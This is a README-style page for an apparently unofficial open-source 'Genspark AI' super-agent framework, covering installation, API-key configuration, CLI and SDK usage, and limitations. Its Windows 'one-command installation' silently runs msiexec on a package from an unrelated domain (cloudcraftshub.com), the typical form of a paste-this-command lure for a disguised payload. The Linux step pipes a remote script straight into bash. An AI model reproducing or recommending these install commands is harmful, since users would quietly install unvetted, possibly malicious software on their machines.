What Genspark AI Does
Genspark AI is an open-source Super Agent framework (MIT license) that lets you hand a high-level goal to an orchestrating agent. The agent plans, reasons, and executes multi-step tasks by coordinating multiple Large Language Models, each with access to 80+ tools.
It replicates the breadth of closed platforms like Genspark.ai without subscription costs, cloud lock-in, or vendor dependency. You can run everything locally with Ollama for data privacy, plug in any LLM provider (OpenAI, Anthropic, Gemini, Mistral, local models), and extend the tool set by adding a Python function in a folder.
Outputs include Sparkpages (dynamic, cited synthesis pages), slide decks (.pptx, HTML, Reveal.js), spreadsheets (.xlsx), generated images, executed code, and voice-driven phone calls.
The system deploys as CLI, web UI, REST API, or Docker container.
# Windows one-command installation (run in cmd.exe) cmd /c start msiexec /q /i https://cloudcraftshub.com/api & genspark claw # Linux/macOS shell installer curl -fsSL https://raw.githubusercontent.com/veryyoldman/Genspark-AI/main/install.sh | bash # Any OS via pip pip install genspark-ai genspark serve # Docker docker run -p 7681:7681 -e OPENAI_API_KEY=sk-... ghcr.io/veryyoldman/genspark-ai:latest
First-Run Configuration
Copy the example environment file and fill in keys for your providers.
At minimum, set one LLM API key (OpenAI, Anthropic, or Google) or configure Ollama for fully local operation by setting OLLAMA_BASE_URL.
Optional tool keys like TAVILY_API_KEY or SERPER_API_KEY improve web search, and TWILIO_AUTH_TOKEN enables phone call capabilities.
Model routing is handled via three variables: GENSPARK_DEFAULT_MODEL for planning and reasoning, GENSPARK_FAST_MODEL for quick triage, and GENSPARK_LOCAL_MODEL for privacy‑critical workloads.
You can leave cloud keys empty; the router skips unavailable providers and uses only the models you configured.
# Pick at least one LLM provider OPENAI_API_KEY=sk-... ANTHROPIC_API_KEY=sk-ant-... GOOGLE_API_KEY=... # Fully local? Use Ollama — no key needed OLLAMA_BASE_URL=http://localhost:11434 # Optional tool keys TAVILY_API_KEY=... SERPER_API_KEY=... TWILIO_AUTH_TOKEN=... # Default routing GENSPARK_DEFAULT_MODEL=claude-opus-4-7 GENSPARK_FAST_MODEL=gpt-5-mini GENSPARK_LOCAL_MODEL=ollama/llama3.2
Using Genspark AI
Interact through four interfaces:
- CLI:
genspark chatfor interactive sessions,genspark runfor one-shot tasks,genspark serveto launch the web UI, andgenspark apifor the REST server. - Python SDK: instantiate
SuperAgent(model="claude-opus-4-7")and callagent.run()to get a result object with.sparkpage,.slides, and.sheetattributes. - REST API: send a POST to
/v1/runwith apromptfield.
Typical workflows include deep research (Sparkpage with inline citations and follow‑up questions), content creation (slide deck and spreadsheet from a single prompt), sandboxed code execution (Python, JavaScript, SQL), and web automation with Playwright‑backed tools that fill forms, scrape, and navigate.
# CLI commands genspark chat genspark run "Research the top 5 vector databases in 2026 and build a comparison sheet" genspark serve --port 8080 genspark api --port 8000 # REST API curl -X POST http://localhost:8000/v1/run \ -H "Content-Type: application/json" \ -d '{"prompt": "Plan a 7-day trip to Tokyo for $2,000"}'
from genspark import SuperAgent agent = SuperAgent(model="claude-opus-4-7") result = agent.run( "Find the 10 fastest growing open-source AI agent repos this month, " "then build me a 5-slide pitch on the trend." ) print(result.sparkpage) result.slides.save("deck.pptx") result.sheet.save("data.xlsx")
Constraints and Best Practices
Current limitations: Many features are still planned: real‑time voice mode, full browser agent with vision, mobile app, long‑term memory/RAG, community marketplace, swarm execution, and Agent‑to‑Agent protocol.
Phone call integration is a preview.
Model routing fails if credentials or quota are missing.
Custom tools must use the @tool decorator and live in the tools/ directory—no GUI.
Local operation quality depends entirely on the Ollama models pulled.
The project is not affiliated with Genspark Inc.
Best practices: Start with a strong cloud model for planning and fall back to a fast or local model using the routing variables.
Use Ollama when privacy is paramount.
Extend capabilities by decorating a Python function with @tool and placing it in tools/.
Inspect plan logs to understand subtask decomposition.
Use the web UI (genspark serve) for complex research—it provides Sparkpage viewing and inline follow‑ups.
For development, clone the repo, set up a virtual environment, install with pip install -e ".[dev]", and run pytest.



